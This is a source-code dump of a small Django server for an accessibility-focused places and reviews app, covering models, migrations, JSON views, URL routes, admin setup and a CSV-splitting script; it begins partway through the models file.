self.pk,\n 
street_name = self.street_name,\n city = self.city.city_name)\n\n\nclass Address(models.Model):\n street_num = models.IntegerField()\n street = models.ForeignKey(Street)\n city = models.ForeignKey(City)\n\n def __unicode__(self):\n return self.street.street_name + ' ' + str(self.street_num) + ', ' + self.city.city_name\n\n def as_json(self):\n return dict(\n id = self.pk,\n street = self.street.street_name,\n streetNum = self.street_num,\n city = self.city.city_name)\n \n\nclass SP(models.Model):\n # CATEGORIES:\n MEDICAL = 'medical'\n RESTAURANTS = 'restaurants'\n SHOPPING = 'shopping'\n PUBLIC_SERVICES = 'public_services'\n TRANSPORTATION = 'transportation'\n HELP = 'help'\n\n CATEGORY_CHOICES = (\n (MEDICAL, 'Medical'),\n (RESTAURANTS, 'Restaurants'),\n (SHOPPING, 'Shopping'),\n (PUBLIC_SERVICES, 'Public Services'),\n (TRANSPORTATION, 'Transportation'),\n (HELP, 'Help'),\n )\n\n\n # Fields:\n sp_address = models.ForeignKey(Address)\n name = models.CharField(max_length=100, db_index=True)\n desc = models.CharField(max_length=225, blank = True)\n longitude = models.DecimalField(max_digits=7, decimal_places=7, db_index=True, blank=True, null=True)\n latitude = models.DecimalField(max_digits=7, decimal_places=7, db_index=True, blank=True, null=True)\n phone = models.CharField(max_length=13, db_index=True, blank = True)\n is_verified = models.BooleanField(default=False)\n discount = models.IntegerField(default=0, db_index=True, blank = True)\n category = models.CharField(max_length=45, choices=CATEGORY_CHOICES)\n created = models.DateTimeField(auto_now_add=True)\n website = models.URLField(blank = True)\n rank = models.BigIntegerField(default=0, blank=True)\n voters = models.IntegerField(default=0, blank=True)\n # Accessibility Fields\n toilets = models.BooleanField(default=False)\n elevator = models.BooleanField(default=False)\n entrance = models.BooleanField(default=False)\n facilities = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n \"\"\"\n TODO: Add Accecability fileds:\n entrance : ramp, wideCoridors, wideEntrance\n facilities: allowServicePets, counters, fittingRooms: handbars, chair/bench\n Toilets: handicapToilets, handbars, accecible sink\n \"\"\"\n\n # Add Photos Support\n\n # Functions\n def address(self):\n return unicode(self.sp_address)\n\n def __unicode__(self):\n return self.name + ', ' + self.address()\n\n #Json Parsers\n def as_json(self, withReviews):\n addressText = unicode(self.address())\n\n response= dict(\n id = self.pk,\n name = self.name,\n desc = self.desc,\n address = addressText,\n longitude = self.longitude,\n latitude = self.latitude,\n phone = self.phone,\n is_verified =self.is_verified,\n discount = self.discount,\n category =self.category,\n website = self.website,\n toilets= self.toilets,\n elevator = self.elevator,\n entrance = self.entrance,\n facilities = self.facilities,\n parking =self.parking,\n )\n\n if (withReviews):\n reviews = self.review_set.all()\n reviewsList = list()\n for review in reviews:\n reviewsList.append(review.as_json())\n print reviewsList\n response['reviews'] = reviewsList\n\n return response\n\nclass Review(models.Model):\n title = models.CharField(max_length=225)\n content = models.TextField(blank = True)\n likes = models.IntegerField(default=0, blank= True, db_index=True)\n sp = models.ForeignKey(SP)\n user = models.ForeignKey(User)\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return self.title\n\n def as_json(self):\n return dict(\n id = self.pk,\n title 
= self.title,\n            content = self.content,\n            likes = self.likes,\n            created = self.created.isoformat(),\n            user = self.user.as_json())\n" }, { "alpha_fraction": 0.5268924236297607, "alphanum_fraction": 0.5318725109100342, "avg_line_length": 24.743589401245117, "blob_id": "2eed4850aaa75236646a4acb167e92295c9f1035", "content_id": "de95b58b10ec4806858984f8c155aa9f61d82e57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 53, "num_lines": 39, "path": "/togetthereApp/migrations/0002_auto_20150523_1910.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('togetthereApp', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='sp',\n            name='elevator',\n            field=models.BooleanField(default=False),\n        ),\n        migrations.AddField(\n            model_name='sp',\n            name='entrance',\n            field=models.BooleanField(default=False),\n        ),\n        migrations.AddField(\n            model_name='sp',\n            name='facilities',\n            field=models.BooleanField(default=False),\n        ),\n        migrations.AddField(\n            model_name='sp',\n            name='parking',\n            field=models.BooleanField(default=False),\n        ),\n        migrations.AddField(\n            model_name='sp',\n            name='toilets',\n            field=models.BooleanField(default=False),\n        ),\n    ]\n" }, { "alpha_fraction": 0.5142180323600769, "alphanum_fraction": 0.5379146933555603, "avg_line_length": 28.066667556762695, "blob_id": "eb4bded364e209bc23dc2352ac189f0abdcb9325", "content_id": "9b5e0714e8266b3318db0f0811f35143da11364c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/Resources/streetSpliter.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "\n\nif __name__ == '__main__':\n\n    with open(\"street.csv\", \"r\") as streets:\n        counter = 0\n        fileCounter = 0\n        output = open('streets0.csv', 'w')\n        for line in streets:\n            if counter == 1500:\n                counter = 0\n                fileCounter = fileCounter + 1\n                output.close()\n                output = open('streets' + str(fileCounter) + '.csv', 'w')\n            output.write(line)\n            counter = counter + 1\n        output.close()" }, { "alpha_fraction": 0.7005444765090942, "alphanum_fraction": 0.7023593187332153, "avg_line_length": 20.230770111083984, "blob_id": "14c583e6462e417fe4eeb9ba416cfc47bef8c95", "content_id": "dc793f1d2bb8d09a21cb84c6e04f62b7e3f9fdf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 551, "license_type": "no_license", "max_line_length": 46, "num_lines": 26, "path": "/togetthereApp/admin.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom .models import *\n\n\nclass UserAdmin(admin.ModelAdmin):\n    list_display = ('__unicode__', 'created')\n\n\nclass ReviewInLine(admin.StackedInline):\n    model = Review\n    extra = 1\n\n\nclass SPAdmin(admin.ModelAdmin):\n    list_display = ('__unicode__', 'category')\n    list_filter = ['category']\n    inlines = [ReviewInLine]\n\nclass CityAdmin(admin.ModelAdmin):\n    list_display = ('__unicode__',)\n\nadmin.site.register(SP, SPAdmin)\nadmin.site.register(User,UserAdmin)\nadmin.site.register(City, CityAdmin)\nadmin.site.register(Street)" }, {
"alpha_fraction": 0.619210958480835, "alphanum_fraction": 0.6346483826637268, "avg_line_length": 37.043479919433594, "blob_id": "5948f8a2b0d023dc98b2900c9d006fef9f497a8f", "content_id": "3e85d607acc491e70b52dfb21d2cfc85f9139986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1749, "license_type": "no_license", "max_line_length": 113, "num_lines": 46, "path": "/togetthereApp/urls.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # ex: /ToGetThere/\n\turl(r'^$', views.index, name='index'),\n\n # ex: /ToGetThere/android/city/\n url(r'^android/city/$', views.cities, name='view_cities'),\n\n # ex: /ToGetThere/android/city/1/streets/\n url(r'^android/city/(?P<city_id>[0-9]+)/streets/$', views.streetByCity, name='street_by_city'),\n\n # ex: /ToGetThere/android/category/medical/\n url(r'^android/category/(?P<category_id>medical|restaurants|shopping|public_services|transportation|help)/$',\n views.spByCategoryList, name='sp_by_category'),\n\n # ex: /ToGetThere/android/sp/1/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/$', views.spView, name='spView'),\n\n # ex: /ToGetThere/android/sp/add/\n url(r'^android/sp/add/$', views.addSp, name='add_sp'),\n\n # ex: /ToGetThere/android/sp/1/rank/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/rank/$', views.rankSp, name='rank_sp_view'),\n\n # ex: /ToGetThere/android/sp/1/edit/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/edit/$', views.editSP, name='edit_sp_view'),\n\n # ex: /ToGetThere/android/sp/1/reviews/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/reviews/$', views.spReviews, name='sp_reviews'),\n\n # ex: /ToGetThere/android/sp/1/addreview/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/addreview/$', views.spAddReview, name='add_sp_review'),\n\n # ex: /ToGetThere/android/user/1/\n url(r'^android/user/(?P<user_id>[0-9]+)/$', views.userProfile, name='user_profile'),\n\n # ex: /ToGetThere/android/myprofile/1/\n url(r'^android/myprofile/(?P<user_id>[0-9]+)/$', views.userProfile, name='my_profile'),\n\n # ex: /ToGetThere/android/editprofile/1/\n url(r'^android/editprofile/(?P<user_id>[0-9]+)/$', views.editProfile, name='edit_profile'),\n\n]" }, { "alpha_fraction": 0.7194570302963257, "alphanum_fraction": 0.7194570302963257, "avg_line_length": 30.571428298950195, "blob_id": "2ce852c55ed265c896ba36802f79ffa0f708fec6", "content_id": "1667df0fcbb6fff4811fba0a6244576fb8884b94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 80, "num_lines": 7, "path": "/ToGetThere/urls.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^ToGetThere/', include('togetthereApp.urls', namespace=\"ToGetThere\")),\n url(r'^admin/', include(admin.site.urls))\n]\n" }, { "alpha_fraction": 0.542029619216919, "alphanum_fraction": 0.549651563167572, "avg_line_length": 44.91999816894531, "blob_id": "f5ee65538f40332253ebc513d6f0d671ce68ecea", "content_id": "c9f1246e75397a632c173907d296ede8cff0179b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4592, "license_type": "no_license", "max_line_length": 262, "num_lines": 100, "path": "/togetthereApp/migrations/0001_initial.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "# 
-*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Address',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('street_num', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='City',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('city_name', models.CharField(unique=True, max_length=50, db_index=True)),\n ],\n ),\n migrations.CreateModel(\n name='Review',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=225)),\n ('content', models.TextField(blank=True)),\n ('likes', models.IntegerField(default=0, db_index=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='SP',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100, db_index=True)),\n ('desc', models.CharField(max_length=225, blank=True)),\n ('longitude', models.DecimalField(db_index=True, null=True, max_digits=7, decimal_places=7, blank=True)),\n ('latitude', models.DecimalField(db_index=True, null=True, max_digits=7, decimal_places=7, blank=True)),\n ('phone', models.CharField(db_index=True, max_length=13, blank=True)),\n ('is_verified', models.BooleanField(default=False)),\n ('discount', models.IntegerField(default=0, db_index=True, blank=True)),\n ('category', models.CharField(max_length=45, choices=[(b'medical', b'Medical'), (b'restaurants', b'Restaurants'), (b'shopping', b'Shopping'), (b'public_services', b'Public Services'), (b'transportation', b'Transportation'), (b'help', b'Help')])),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('website', models.URLField(blank=True)),\n ('rank', models.BigIntegerField(default=0, blank=True)),\n ('voters', models.IntegerField(default=0, blank=True)),\n ('sp_address', models.ForeignKey(to='togetthereApp.Address')),\n ],\n ),\n migrations.CreateModel(\n name='Street',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('street_name', models.CharField(max_length=50, db_index=True)),\n ('city', models.ForeignKey(to='togetthereApp.City')),\n ],\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('facebook_id', models.CharField(max_length=30, blank=True)),\n ('first_name', models.CharField(max_length=35, db_index=True)),\n ('last_name', models.CharField(db_index=True, max_length=35, blank=True)),\n ('email', models.EmailField(db_index=True, max_length=254, blank=True)),\n ('birthday', models.DateField(blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.AddField(\n model_name='review',\n name='sp',\n field=models.ForeignKey(to='togetthereApp.SP'),\n ),\n migrations.AddField(\n model_name='review',\n name='user',\n field=models.ForeignKey(to='togetthereApp.User'),\n ),\n migrations.AddField(\n model_name='address',\n name='city',\n field=models.ForeignKey(to='togetthereApp.City'),\n ),\n migrations.AddField(\n model_name='address',\n name='street',\n 
field=models.ForeignKey(to='togetthereApp.Street'),\n ),\n migrations.AlterUniqueTogether(\n name='street',\n unique_together=set([('city', 'street_name')]),\n ),\n ]\n" }, { "alpha_fraction": 0.6087080240249634, "alphanum_fraction": 0.6156801581382751, "avg_line_length": 40.3470573425293, "blob_id": "ea99cf5310a5268ffe37fe8bfb375d26fc0b2042", "content_id": "ba6e7f1f0b477959d66758575b54011129fa520d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7028, "license_type": "no_license", "max_line_length": 134, "num_lines": 170, "path": "/togetthereApp/views.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.http import *\nfrom .forms import *\nfrom django.shortcuts import get_object_or_404,get_list_or_404, render\nimport json\nfrom django.core.urlresolvers import reverse\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom togetthereApp import forms\n\nDEBUG = True\n\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the ToGetThere index.\")\n\ndef spByCategoryList(request, category_id):\n sps = list(SP.objects.filter(category = category_id))\n results = [sp.as_json(False) for sp in sps]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n\ndef spView(request, sp_id):\n sp = get_object_or_404(SP,pk=sp_id)\n return HttpResponse(json.dumps(sp.as_json(True), ensure_ascii=False), content_type=\"application/json\")\n\n\ndef addSp(request):\n if (request.method == 'GET') & (DEBUG):\n sp_form = SPForm()\n address_form = AddressForm()\n return render(request, 'ToGetThere/addSP.html', {\n 'address_form': address_form,\n 'sp_form':sp_form})\n elif request.method == 'POST':\n sp_form = SPForm(request.POST)\n address_form = AddressForm(request.POST)\n\n if (sp_form.is_valid() and address_form.is_valid()):\n name_from_form = sp_form.cleaned_data['name']\n desc_from_form = sp_form.cleaned_data['desc']\n category_from_form = sp_form.cleaned_data['category']\n lon_from_form = sp_form.cleaned_data['longitude']\n lat_from_form = sp_form.cleaned_data['latitude']\n phone_from_form = sp_form.cleaned_data['phone']\n discount_from_form = sp_form.cleaned_data['discount']\n website_from_form = sp_form.cleaned_data['website']\n city_from_form = address_form.cleaned_data['city']\n street_from_form = address_form.cleaned_data['street']\n streetnum_from_form = address_form.cleaned_data['street_num']\n if (street_from_form.city.pk != city_from_form.pk):\n raise Http404('Street does not match city')\n return\n\n\n formAddress, created = Address.objects.get_or_create(\n street_num= streetnum_from_form,\n street= street_from_form,\n city = city_from_form)\n\n formsp = SP.objects.filter(name= name_from_form, sp_address=formAddress.pk)\n if not formsp.exists():\n formsp = SP.objects.create(\n name= name_from_form,\n desc= desc_from_form,\n sp_address=formAddress,\n longitude=lon_from_form,\n latitude=lat_from_form,\n phone=phone_from_form,\n discount= discount_from_form,\n category=category_from_form,\n website=website_from_form)\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(formsp.pk,)))\n \n # SP exists: redirect to update\n else:\n\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(formsp[0].pk,)))\n \n else:\n raise Http404(str(sp_form.errors) + '\\n' + str(address_form.errors) + '\\n')\n\n\n#TODO\ndef rankSp(request, sp_id):\n reviews = get_list_or_404(Review, sp=sp_id)\n results = [rev.as_json() for rev in 
reviews]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n \n\n\ndef spReviews(request, sp_id):\n reviews = get_list_or_404(Review, sp=sp_id)\n results = [rev.as_json() for rev in reviews]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n\ndef spAddReview(request, sp_id):\n\n if (request.method == 'GET') & (DEBUG):\n form = AddReviewForm()\n return render(request, 'ToGetThere/addReview.html', {'form': form,})\n elif request.method == 'POST':\n form = AddReviewForm(request.POST)\n if form.is_valid():\n formTitle = form.cleaned_data['title']\n formContent = form.cleaned_data['content']\n formUser = form.cleaned_data['user']\n formSp = SP.objects.get(pk = sp_id)\n review = Review(title = formTitle, content= formContent, user = formUser, sp= formSp)\n review.save()\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(review.sp.pk,)))\n else:\n raise Http404(form.errors)\n\n\ndef editSP(request, sp_id):\n sp = get_object_or_404(SP, pk = sp_id)\n address = sp.sp_address\n if (request.method == 'GET') & (DEBUG):\n sp_form = SPForm(instance= sp)\n address_form = AddressForm(instance= address)\n return render(request, 'ToGetThere/addSP.html', {\n 'address_form': address_form,\n 'sp_form':sp_form})\n\n elif (request.method == 'POST'):\n sp_form = SPForm(request.POST, instance= sp)\n address_form = AddressForm(request.POST, instance= address)\n\n if (sp_form.is_valid() and address_form.is_valid()):\n city_from_form = address_form.cleaned_data['city']\n street_from_form = address_form.cleaned_data['street']\n if (street_from_form.city.pk != city_from_form.pk):\n raise Http404('Street does not match city, street: '+ str(street_from_form.city.pk)+', city: '+ str(city_from_form.pk))\n return\n\n editedSP = sp_form.save(commit = False)\n editedAddress = address_form.save()\n editedSP.sp_address = editedAddress\n editedSP.save()\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(editedSP.pk,)))\n\n else:\n raise Http404(str(sp_form.errors) + '\\n' + str(address_form.errors) + '\\n')\n\ndef userProfile(request, user_id):\n user = get_object_or_404(User,pk=user_id)\n return HttpResponse(json.dumps(user.as_json(), ensure_ascii=False), content_type=\"application/json\")\n\ndef editProfile(request, user_id):\n user = get_object_or_404(User, pk = user_id)\n if (request.method == 'GET') & (DEBUG):\n user_form = UserForm(instance= user)\n return render(request, 'ToGetThere/editProfile.html', {\n 'user_form': user_form})\n\n elif (request.method == 'POST'):\n user_form = UserForm(request.POST, instance= user)\n if user_form.is_valid():\n editedUser = user_form.save()\n return HttpResponseRedirect(reverse('ToGetThere:user_profile', args=(editedUser.pk,)))\n\n else:\n raise Http404(str(user_form.errors))\n\ndef streetByCity(request, city_id):\n streets = get_list_or_404(Street, city_id = city_id)\n results = [street.as_json() for street in streets]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n\ndef cities(request):\n cities = get_list_or_404(City)\n results = [city.as_json() for city in cities]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")" } ]
9
kalambet/mno
https://github.com/kalambet/mno
debbe138a84ab99ad90a7ad5747fc3799e60944f
45bddda29ddbffa84bea42fe9bbcf0b0ac479baa
a632e4000f764be6de7879b8a98b44f97c459938
refs/heads/master
2020-08-30T11:12:54.247308
2019-07-22T09:52:21
2019-07-22T09:52:33
218,362,405
1
1
null
2019-10-29T19:03:07
2019-10-21T14:37:11
2019-07-22T09:52:56
null
[ { "alpha_fraction": 0.41361916065216064, "alphanum_fraction": 0.47919294238090515, "avg_line_length": 19.341463088989258, "blob_id": "61a317328cca3513e7c2e65464ed13d645864716", "content_id": "bcf51448fe5b6e9fb389d0fd348f523e4b07afcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 59, "num_lines": 41, "path": "/mno.py", "repo_name": "kalambet/mno", "src_encoding": "UTF-8", "text": "colors = [\n    \"000000\",\n    \"0a0a0a\",\n    \"191919\",\n    \"333333\",\n    \"4c4c4c\",\n    \"666666\",\n    \"7f7f7f\",\n    \"999999\",\n    \"b2b2b2\",\n    \"cccccc\",\n    \"e5e5e5\",\n    \"f5f5f5\",\n    \"ffffff\",\n]\n\n\ndef convert():\n    lht = open(\"themes/lht.json\", \"r\")\n    drk = open(\"themes/drk.json\", \"w\")\n\n    lines = []\n\n    for line in lht.readlines():\n        if any(clr in line for clr in colors):\n            lht_clr = \"\".join(list(line.split(\"#\")[1])[:6])\n            lht_clr_ndx = colors.index(lht_clr)\n\n            drk_clr_ndx = (int(lht_clr_ndx) * -1) - 1\n            drk_clr = colors[drk_clr_ndx]\n\n            line = line.replace(lht_clr, drk_clr)\n            lines.append(line)\n        else:\n            lines.append(line)\n\n    drk.write(\"\".join(lines))\n    lht.close()\n    drk.close()\n\n\nif __name__ == \"__main__\":\n    convert()\n" }, { "alpha_fraction": 0.7017543911933899, "alphanum_fraction": 0.7953216433525085, "avg_line_length": 170, "blob_id": "c4501e99d2ebb2c4b574a2fa12fc9d0dae06f335", "content_id": "0fbd47f5457a1553ad5bb7e91783bd69d5e2ba93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 342, "license_type": "no_license", "max_line_length": 171, "num_lines": 2, "path": "/readme.md", "repo_name": "kalambet/mno", "src_encoding": "UTF-8", "text": "[![Downloads](https://img.shields.io/visual-studio-marketplace/d/u29dc.mno.svg?colorA=000000&colorB=000000)](https://marketplace.visualstudio.com/items?itemName=u29dc.mno)\n[![Version](https://img.shields.io/visual-studio-marketplace/v/u29dc.mno.svg?colorA=000000&colorB=000000)](https://marketplace.visualstudio.com/items?itemName=u29dc.mno)\n" } ]
2
bazator/Stat.Zal.
https://github.com/bazator/Stat.Zal.
f0c9b92d588cc72e0bd39607c1f2cd421cdb929f
4420460df74cc0ef8196f5f9aecf8edded382e7a
a799d9063c2f94dd48f305f60596e908105bf57d
refs/heads/master
2023-05-11T07:11:29.272226
2020-05-31T20:05:27
2020-05-31T20:05:27
268,355,362
0
0
null
2020-05-31T20:07:22
2020-05-31T20:08:46
2023-05-01T22:37:47
Python
[ { "alpha_fraction": 0.723192036151886, "alphanum_fraction": 0.7256857752799988, "avg_line_length": 32.41666793823242, "blob_id": "dc4ba17926a968f4d62ac72453be797af1a6aa81", "content_id": "a981de01532565972bddadcab1289325c77a5720", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 802, "license_type": "no_license", "max_line_length": 93, "num_lines": 24, "path": "/model.py", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "import random\nimport nltk\n\n\ndef gender_features(word):\n return {'last_letter': word[-1]} # ostatnia litera imienia jako cecha okreslajaca plec\n\n\ndef predict_gender(labeled_names, name_to_predict):\n # losowanie wczytanych imion\n random.shuffle(labeled_names)\n\n # konwersja zbioru imion na zbior cech\n feature_set = [(gender_features(n), gender) for (n, gender) in labeled_names]\n\n # Podzial listy imion na zbior treningowy i testowy\n half = int(len(feature_set) / 2)\n train_set, test_set = feature_set[half:], feature_set[:half]\n\n # trenowanie klasyfikatora naive Bayes, danymi z bazy danych\n classifier = nltk.NaiveBayesClassifier.train(train_set)\n\n # uzycie klasyfikatora, do przewidzenia odpowiedzi\n return classifier.classify(gender_features(name_to_predict))\n" }, { "alpha_fraction": 0.6472346782684326, "alphanum_fraction": 0.6532137393951416, "avg_line_length": 28.130434036254883, "blob_id": "756c08469afa9aae40b684dd7f434269273a84a7", "content_id": "f819eacdb65ae720efa7afc2d583cb79ed265525", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/main.py", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "from flask import Flask, request, render_template\nfrom model import predict_gender\nfrom commands import insert_data_command\nimport db as db_config\n\napp = Flask(__name__)\ndb_config.init_app(app)\napp.cli.add_command(insert_data_command)\n\n\[email protected]('/', methods=['POST', 'GET'])\ndef hello_world():\n if request.method == 'POST':\n name = request.form['name']\n result = db_config.get_db().execute('SELECT* FROM person_name')\n names = [(name['name'], name['gender']) for name in result]\n gender = predict_gender(names, name)\n\n return render_template('base.html', **locals())\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True, host=\"0.0.0.0\")" }, { "alpha_fraction": 0.554347813129425, "alphanum_fraction": 0.6413043737411499, "avg_line_length": 21.75, "blob_id": "51d917045385dfa597ed661e41bf999d227cb5df", "content_id": "527dbc30369d261578e90a94fee87ca65badff3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 92, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/start.sh", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp=\"docker.imiona\"\ndocker build -t ${app} .\ndocker run -d -p 5000:5000 ${app}\n\n" }, { "alpha_fraction": 0.7564102411270142, "alphanum_fraction": 0.7564102411270142, "avg_line_length": 21.428571701049805, "blob_id": "8540715a94f9415cbefde3015cfc3a99bd56be98", "content_id": "236e566a70dd6ea09b878c10235835180f291354", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 156, "license_type": "no_license", "max_line_length": 39, "num_lines": 7, "path": "/schema.sql", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", 
"text": "DROP TABLE IF EXISTS person_name;\n\nCREATE TABLE person_name (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT UNIQUE NOT NULL,\n gender TEXT NOT NULL\n);" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7452107071876526, "avg_line_length": 23.85714340209961, "blob_id": "ea850e6137ccc08a3f5bc5371edc4d3dd4c89315", "content_id": "9cc14659b61022e75fbb2c376801807f1871fc51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 522, "license_type": "no_license", "max_line_length": 89, "num_lines": 21, "path": "/Dockerfile", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "FROM ubuntu:18.04\n\nRUN apt-get update -y && apt-get install -y python-pip python-dev python3-dev python3-pip\n\nENV STATIC_URL /static\nENV STATIC_PATH /home/docker-server/www/app/static\nCOPY ./requirements.txt /var/www/requirements.txt\n\nWORKDIR /app\n\nCOPY . /app\nCOPY templates /app/templates\n\nRUN python3 -m pip install -r /app/requirements.txt \nENV FLASK_APP /app/main.py\nENV LC_ALL C.UTF-8\nENV LANG C.UTF-8\nRUN python3 -m flask init-db\nRUN python3 -m flask insert-data polish_names.csv\n\nCMD [ \"python3\", \"/app/main.py\" ]\n" }, { "alpha_fraction": 0.6463414430618286, "alphanum_fraction": 0.6480836272239685, "avg_line_length": 23.95652198791504, "blob_id": "67756a271e451354206160d00938d97edb86ce63", "content_id": "35d34ff7836d801545a5240cd4ca614c342f39f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 574, "license_type": "no_license", "max_line_length": 76, "num_lines": 23, "path": "/commands.py", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "import click\nfrom flask.cli import with_appcontext\nimport db as db_config\n\n\[email protected]('insert-data')\[email protected](\"filename\")\n@with_appcontext\ndef insert_data_command(filename):\n db = db_config.get_db()\n items = []\n\n file = open(filename, 'r', encoding='utf8')\n file.readline()\n for line in file:\n name, gender = line.split(',')\n items.append((name.strip(), gender.strip()))\n\n query = 'INSERT OR IGNORE INTO person_name (name, gender) VALUES (?, ?)'\n db.executemany(query, items)\n db.commit()\n\n click.echo('Names inserted.')\n" } ]
6
mahgadalla/BladeX
https://github.com/mahgadalla/BladeX
bd625f73cb9413c9919cb2656ebcb1de101e06d1
22f7cf2054ff927a595e55db379702a1fc82478f
45f15d4eb00f88a7a71d03e744ec13618ba826c6
refs/heads/master
2021-04-09T10:17:48.688045
2018-06-20T16:23:14
2018-06-20T16:23:14
125,380,428
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5486994981765747, "alphanum_fraction": 0.5722267031669617, "avg_line_length": 37.63069534301758, "blob_id": "17f3fd6b76ea9ee6ba2ac03e58b90798a725f1ce", "content_id": "774f77d8f2574fbaafa4feda214e72aead06176e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16109, "license_type": "permissive", "max_line_length": 80, "num_lines": 417, "path": "/tests/test_blade.py", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nimport bladex.profiles as pr\nimport bladex.blade as bl\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\n\ndef create_sample_blade_NACA():\n sections = np.asarray([pr.NacaProfile(digits='0012') for i in range(10)])\n radii = np.arange(0.4, 1.31, 0.1)\n chord_lengths = np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3])))\n pitch = np.append(np.arange(3.0, 4., 0.2), np.arange(4.1, 3.2, -0.2))\n rake = np.append(np.arange(5e-3, 0.08, 1e-2), np.arange(0.075, 0.02, -3e-2))\n skew_angles = np.append(np.arange(-4., -9., -3.), np.arange(-7., 15., 3.))\n return bl.Blade(\n sections=sections,\n radii=radii,\n chord_lengths=chord_lengths,\n pitch=pitch,\n rake=rake,\n skew_angles=skew_angles)\n\n\ndef create_sample_blade_custom():\n xup = np.linspace(-1.0, 